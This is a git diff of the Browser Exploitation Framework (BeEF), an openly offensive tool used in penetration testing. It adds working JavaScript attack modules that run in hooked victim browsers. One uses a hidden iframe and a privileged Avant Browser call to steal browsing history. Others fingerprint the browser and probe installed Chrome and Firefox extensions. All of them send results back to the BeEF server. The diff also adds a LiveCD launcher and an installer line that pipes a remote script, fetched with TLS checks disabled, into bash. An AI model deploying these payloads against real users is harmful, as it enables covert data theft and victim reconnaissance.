-# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # puts "\nWelcome to the BeEF installer!" diff --git a/install-beef b/install-beef index 5428316c6..a9e42a0b5 100644 --- a/install-beef +++ b/install-beef @@ -1,20 +1,12 @@ #!/bin/bash # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # +set -e + clear echo "======================================" echo " BeEF Installer " @@ -86,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion -bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) +curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc diff --git a/liveCD/BeEFLive.sh b/liveCD/BeEFLive.sh new file mode 100644 index 000000000..ef4bb368d --- /dev/null +++ b/liveCD/BeEFLive.sh @@ -0,0 +1,311 @@ +#!/bin/bash +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'home/beef/doc/COPYING' for copying permission +# + + +# +# This is the auto startup script for the BeEF Live CD. +# IT SHOULD ONLY BE RUN ON THE LIVE CD +# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso +# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c +# +# This script contains a few fixes to make BeEF play nicely with the way +# remastersys creates the live cd distributable as well as generating host keys +# to enable SSH etc. The script also make it easy for the user to update/start +# the BeEF server +# + +# +# Create a shortcut in the user's home folder to BeEF, msf and sqlmap +# (if they do not yet exist) +# +f1="beef" +if [ -f $f1 ] ; then + echo "" +else + ln -s /opt/beef/ beef + ln -s /opt/metasploit-framework/ msf + ln -s /opt/sqlmap/ sqlmap +fi + +# +# function to allow BeEF to run in the background +# +run_beef() { + cd /opt/beef/ + ruby beef -x +} + +# +# function to start msf and run in the background +# +run_msf() { + # start msf + /opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null +} + +# +# functions to enable or disable msf integration +# +enable_msf() { + # enable msf integration in main config file + sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n enable: true/g;P;D' /opt/beef/config.yaml + # enable auto_msfrpcd + sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml +} +disable_msf() { + # disable msf integration in main config file + sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n enable: false/g;P;D' /opt/beef/config.yaml + # disable auto_msfrpcd + sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml +} + +# +# function to exit cleanly +# +# trap ctrl-c and call close_bash() +trap close_bash_t INT + +close_bash_t() { + # beef would have quit + back_running="0" + close_bash +} +close_bash() { + echo "" + echo "Are you sure you want to exit the LiveCD? (y/N): " + read var + if [ $var = "y" ] ; then + disable_msf + exit + else + show_menu + fi +} + +# set default values +bac="0" + + + +# +# User Menu Loop +# +show_menu() { + while true; do + clear + echo "======================================" + echo " BeEF Live CD " + echo "======================================" + echo "" + echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net" + echo "Browser Exploitation Framework (BeEF) - http://beefproject.com" + echo "See the file 'home/beef/doc/COPYING' for copying permission" + echo "" + + echo "Welcome to the BeEF Live CD" + echo "" + + + # + # Check for SSH Host Keys - if they do not exist SSH will be displayed as disabled + # (remastersys has a habit of deleting them during Live CD Creation) + # + f1="/etc/ssh/ssh_host_rsa_key" + if [ -f $f1 ] ; then + echo "[1] Disable SSH [Currently Enabled]" + echo -ne " beef@" + ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }' + else + echo "[1] Enable SSH [Currently Disabled]" + fi + + echo "[2] Update BeEF" + echo "[3] Update sqlMap (Bundled with LiveCD)" + echo "[4] Update metasploit-framework (Bundled with LiveCD)" + echo "" + if [ "$bac" = "1" ] ; then + echo "[5] Disable BeEF in background mode [Currently Enabled]" + else + echo "[5] Enable BeEF in background mode [Currently Disabled]" + fi + + if [ "$sqlm" = "1" ] ; then + echo "[6] Disable sqlMap demo [Currently Enabled]" + else + echo "[6] Enable sqlMap demo [Currently Disabled]" + fi + + if [ "$msf" = "1" ] ; then + echo "[7] Disable metasploit-framework integration [Currently Enabled]" + else + echo "[7] Enable metasploit-framework integration [Currently Disabled]" + fi + echo "" + echo "[q] Quit to terminal" + echo "" + if [ "$back_running" = "1" ] ; then + echo "[k] End BeEF process [BeEF running in background mode]" + else + echo "[b] Run BeEF" + fi + echo "" + echo -n "BeEF Live ~# " + read var + + # + # Quit liveCD loop + # + if [ $var = "q" ] ; then + close_bash + fi + + # + # Create SSH Keys to enable SSH or Delete the Keys to disable + # + if [ $var = "1" ] ; then + if [ -f $f1 ] + then + sudo rm /etc/ssh/ssh_host_rsa_key + sudo rm /etc/ssh/ssh_host_dsa_key + else + sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N '' + sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N '' + echo "" + echo "Please provide a password for ssh user: beef" + sudo passwd beef + echo "ssh enabled" + fi + fi + + # + # Update BeEF from github repository + # + if [ $var = "2" ] ; then + cd /opt/beef + git stash + git pull + msf="0" + # check for new bundle requirements and update + bundle update + fi + + # + # Update sqlmap from github repository + # + if [ $var = "3" ] ; then + cd /opt/sqlmap + git stash + git pull + fi + + # + # Update msf from github repository + # + if [ $var = "4" ] ; then + cd /opt/metasploit-framework + git stash + git pull + fi + + # + # set BeEF to run in the background + # + if [ $var = "5" ] ; then + if [ "$bac" = "1" ] ; then + bac="0" + # check and disable sqlmap (requires beef run in the background) + sqlm="0" + else + bac="1" + fi + fi + + # + # enable the sqlmap demo + # + if [ $var = "6" ] ; then + if [ "$sqlm" = "1" ] ; then + sqlm="0" + else + sqlm="1" + # requires BeEF be run in the background + bac="1" + fi + fi + + # + # enable the msf integration + # + if [ $var = "7" ] ; then + if [ "$msf" = "1" ] ; then + msf="0" + disable_msf + else + msf="1" + enable_msf + fi + fi + + # + # end background beef process + # + if [ $var = "k" ] ; then + pkill -x 'ruby' + back_running="0" + fi + + # + # Run BeEF + # + if [ $var = "b" ] ; then + + if [ "$msf" = "1" ] ; then + # + # First start msf if it is enabled + # + printf "Starting MSF (wait 45 seconds)..." + run_msf & + sleep 45 + fi + + if [ "$bac" = "1" ] ; then + # + # run beef in the background + # + run_beef & + sleep 5 + echo "" + echo "BeEF is running in the background, returning to the menu or running something else now..." + sleep 15 + back_running="1" + # + # If the user has enabled it start sqlmap using beef as proxy + # + if [ $sqlm = "1" ] ; then + echo "" + echo "sqlMAP can now be run using the --proxy command set to the BeEF Proxy: http://127.0.0.1:6789 starting the wizard to demo with:" + echo "python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard" + sleep 5 + python /opt/sqlmap/sqlmap.py --proxy http://127.0.0.1:6789 --wizard + fi + else + # + # run beef in the foreground + # + cd /opt/beef/ + ruby beef -x + fi + fi + + done +} + +# show user menu +show_menu + + + diff --git a/liveCD/isolinux.txt b/liveCD/isolinux.txt new file mode 100644 index 000000000..76cdda09e --- /dev/null +++ b/liveCD/isolinux.txt @@ -0,0 +1,34 @@ +default vesamenu.c32 +prompt 0 +timeout 100 + +menu title BeEF Live CD +menu background splash.png +menu color title 1;37;44 #c0ffffff #00000000 std + +label live + menu label live - BeEF Beef Live + kernel /casper/vmlinuz + append file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash -- + +label xforcevesa + menu label xforcevesa - boot Live in safe graphics mode + kernel /casper/vmlinuz + append file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash -- + +label install + menu label install - start the installer directly + kernel /casper/vmlinuz + append file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash -- + +label memtest + menu label memtest - Run memtest + kernel /install/memtest + append - + +label hd + menu label hd - boot the first hard disk + localboot 0x80 + append - + + diff --git a/liveCD/splash.png b/liveCD/splash.png new file mode 100644 index 000000000..8f1965468 Binary files /dev/null and b/liveCD/splash.png differ diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js new file mode 100644 index 000000000..faefeaf2b --- /dev/null +++ b/modules/browser/avant_steal_history/command.js @@ -0,0 +1,47 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + if (!beef.browser.isA()) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser."); + return; + } + + var avant_iframe = document.createElement("iframe"); + //var avant_iframe = beef.dom.createInvisibleIframe(); + avant_iframe.setAttribute('src', 'browser:home'); + avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>'); + avant_iframe.setAttribute('width', '0'); + avant_iframe.setAttribute('heigth', '0'); + avant_iframe.setAttribute('scrolling','no'); + avant_iframe.setAttribute('style', 'display:none'); + + document.body.appendChild(avant_iframe); + + var vstr = {value: ""}; + + if (window['avant_history_<%= @command_id %>'].navigator) { + //This works if FF is the rendering engine + window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value); + } else { + // this works if Chrome is the rendering engine + //window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox."); + } + +}); + diff --git a/modules/browser/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml new file mode 100644 index 000000000..bace4b5c0 --- /dev/null +++ b/modules/browser/avant_steal_history/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + avant_steal_history: + enable: true + category: "Browser" + name: "Get Visited URLs (Avant Browser)" + description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.

Note: Avant Browser in Firefox engine mode only." + authors: ["Roberto Suggi Liverani"] + target: + working: ["FF"] diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/browser/avant_steal_history/module.rb similarity index 63% rename from modules/exploits/zenoss_daemon_csrf/config.yaml rename to modules/browser/avant_steal_history/module.rb index 923946d5d..1d0692b76 100644 --- a/modules/exploits/zenoss_daemon_csrf/config.yaml +++ b/modules/browser/avant_steal_history/module.rb @@ -13,13 +13,21 @@ # See the License for the specific language governing permissions and # limitations under the License. # -beef: - module: - zenoss_daemon_csrf: - enable: true - category: "Exploits" - name: "Zenoss <= 3.2.1 Daemon CSRF" - description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." - authors: ["bcoles"] - target: - working: ["ALL"] +class Avant_steal_history < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + + + return [ + {'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js index 3f9012df6..20a959d08 100644 --- a/modules/browser/browser_fingerprinting/command.js +++ b/modules/browser/browser_fingerprinting/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var browser_type = new Array; @@ -43,7 +34,12 @@ beef.execute(function() { new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"), new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"), new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"), + new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"), + new Array("Firefox","10+","chrome://browser/skin/sync-128.png"), + new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"), + new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"), new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"), + new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"), new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png") ); diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml index 0e9c2ea94..475be130e 100644 --- a/modules/browser/browser_fingerprinting/config.yaml +++ b/modules/browser/browser_fingerprinting/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb index ad2157d29..e270a3143 100644 --- a/modules/browser/browser_fingerprinting/module.rb +++ b/modules/browser/browser_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Uses methods described here: # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/ diff --git a/modules/browser/detect_activex/command.js b/modules/browser/detect_activex/command.js new file mode 100644 index 000000000..5db6fc0f1 --- /dev/null +++ b/modules/browser/detect_activex/command.js @@ -0,0 +1,14 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var result = (beef.browser.hasActiveX())? "Yes" : "No"; + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result); + +}); + diff --git a/modules/browser/detect_activex/config.yaml b/modules/browser/detect_activex/config.yaml new file mode 100644 index 000000000..cacbda562 --- /dev/null +++ b/modules/browser/detect_activex/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_activex: + enable: true + category: "Browser" + name: "Detect ActiveX" + description: "This module will check if the browser has ActiveX support." + authors: ["bcoles"] + target: + user_notify: ["IE"] + not_working: ["All"] diff --git a/modules/browser/detect_activex/module.rb b/modules/browser/detect_activex/module.rb new file mode 100644 index 000000000..29ffcf708 --- /dev/null +++ b/modules/browser/detect_activex/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_activex < BeEF::Core::Command + + def post_execute + content = {} + content['activex'] = @datastore['activex'] + save content + end + +end diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js new file mode 100644 index 000000000..2a5e566db --- /dev/null +++ b/modules/browser/detect_default_browser/command.js @@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Written by unsticky +// Ported to BeEF by bcoles +// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/ + +beef.execute(function() { + + var mt = document.mimeType; + + if (mt) { + if (mt == "Safari Document") result = "Safari"; + if (mt == "Firefox HTML Document") result = "Firefox"; + if (mt == "Chrome HTML Document") result = "Chrome"; + if (mt == "HTML Document") result = "Internet Explorer"; + if (mt == "Opera Web Document") result = "Opera"; + } else { + result = "Unknown"; + } + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+result); + +}); + diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml new file mode 100644 index 000000000..80655bc8b --- /dev/null +++ b/modules/browser/detect_default_browser/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_default_browser: + enable: true + category: "Browser" + name: "Detect Default Browser" + description: "This module detects which browser is configured as the default web browser." + authors: ["unsticky", "bcoles"] + target: + working: ["IE"] + not_working: ["All"] diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb new file mode 100644 index 000000000..88233ad01 --- /dev/null +++ b/modules/browser/detect_default_browser/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_default_browser < BeEF::Core::Command + + def post_execute + content = {} + content['browser'] = @datastore['browser'] if not @datastore['browser'].nil? + save content + end + +end diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/browser/detect_extensions/command.js similarity index 92% rename from modules/chrome_extensions/get_chrome_extensions/command.js rename to modules/browser/detect_extensions/command.js index 49a38a176..1ae81109d 100644 --- a/modules/chrome_extensions/get_chrome_extensions/command.js +++ b/modules/browser/detect_extensions/command.js @@ -1,21 +1,12 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - extensions = new Array( + chrome_extensions = new Array( new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"), new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"), new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"), @@ -1018,7 +1009,61 @@ beef.execute(function() { new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily") ); - var detect = function(addon_id, addon_name) { + var firefox_extensions = { + "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png", + "Auto Copy" : "chrome://autocopy/skin/autocopy.png", + "ColorZilla" : "chrome://colorzilla/skin/logo.png", + "Customize Google" : "chrome://customizegoogle/skin/32x32.png", + "DownThemAll!" : "chrome://dta/content/immagini/icon.png", + "Faster Fox" : "chrome://fasterfox/skin/icon.png", + "Flash Block" : "chrome://flashblock/skin/flash-on-24.png", + "FlashGot" : "chrome://flashgot/skin/icon32.png", + "Forecastfox" : "chrome://forecastfox/skin/images/icon.png", + "Google Toolbar" : "chrome://google-toolbar/skin/icon.png", + "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif", + "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png", + "IE View" : "chrome://ieview/skin/ieview-icon.png", + "JS View" : "chrome://jsview/skin/jsview.gif", + "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png", + "MeasureIt" : "chrome://measureit/skin/measureit.png", + "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png", + "SEOpen" : "chrome://seopen/skin/seopen.png", + "Search Status" : "chrome://searchstatus/skin/cax10.png", + "Server Switcher" : "chrome://switcher/skin/icon.png", + "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png", + "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png", + "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png", + "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png", + "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png", + "Web Developer" : "chrome://webdeveloper/content/images/logo.png", + "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png", + "UrlParams" : "chrome://urlparams/skin/urlparams32.png", + "NewsFox" : "chrome://newsfox/skin/images/home.png", + "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png", + "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png", + "QuickJava" : "chrome://quickjava/content/js.png", + "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png", + "BBCode" : "chrome://bbcode/skin/bbcode.png", + "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png", + "ConQuery" : "chrome://conquery/skin/conquery.png", + "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png", + "Extended Cookie Manager" : "chrome://xcm/content/allowed.png", + "FireBug" : "chrome://firebug/content/firebug32.png", + "FoxyTunes" : "chrome://foxytunes/skin/logo.png", + "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png", + "SessionSaver .2" : "chrome://sessionsaver/content/ss.png", + "spooFX" : "chrome://spoofx/skin/main/spoofx.png", + "Statusbar Clock" : "chrome://timestatus/skin/icon.png", + "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png", + "UnPlug" : "chrome://unplug/skin/unplug.png", + "View Source Chart" : "chrome://vrs/skin/vrssmall.png", + "XPather" : "chrome://xpather/content/iconka.png", + "WOT" : "chrome://wot/skin/fusion/logo.png", + "LastPass" : "chrome://lastpass/skin/vaultdelete.png", + + }; + + var detect_chrome_extension = function(addon_id, addon_name) { var s = document.createElement('script'); s.onload = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name); @@ -1027,11 +1072,38 @@ beef.execute(function() { document.body.appendChild(s); } - try { - for (var i=0; i', <%= @command_id %>, 'extension=" + addon_name+ "');"); + img.setAttribute("src", addon_url); + } + + if(beef.browser.isC()) { + try { + for (var i=0; i', <%= @command_id %>, 'fail=detecting Chrome extensions failed'); + } + } else if(beef.browser.isFF()) { + try { + for (var i in firefox_extensions) { + detect_firefox_extension(firefox_extensions[i], i); + } + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed'); + } + } else if(beef.browser.isIE()) { + try { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported'); + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed'); + } + } }); diff --git a/modules/browser/detect_extensions/config.yaml b/modules/browser/detect_extensions/config.yaml new file mode 100644 index 000000000..1f717b7a1 --- /dev/null +++ b/modules/browser/detect_extensions/config.yaml @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_extensions: + enable: true + category: "Browser" + name: "Detect Extensions" + description: "This module detects extensions installed in Google Chrome and Mozilla Firefox." + authors: ["koto", "bcoles", "nbblrr"] + target: + working: + FF: + min_ver: 1 + max_ver: latest + C: + min_ver: 1 + max_ver: 18 + not_working: ["All"] diff --git a/modules/browser/detect_extensions/module.rb b/modules/browser/detect_extensions/module.rb new file mode 100644 index 000000000..2e8b4bf0f --- /dev/null +++ b/modules/browser/detect_extensions/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# More info: +# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html +# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html +# +class Detect_extensions < BeEF::Core::Command + + def post_execute + content = {} + content['extension'] = @datastore['extension'] + save content + end + +end + diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js index 6887c3554..df9070739 100644 --- a/modules/browser/detect_firebug/command.js +++ b/modules/browser/detect_firebug/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not in use or not installed"; if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!"; diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml index 50f54194b..e62499339 100644 --- a/modules/browser/detect_firebug/config.yaml +++ b/modules/browser/detect_firebug/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb index 326d375d2..54e9fdafc 100644 --- a/modules/browser/detect_firebug/module.rb +++ b/modules/browser/detect_firebug/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific 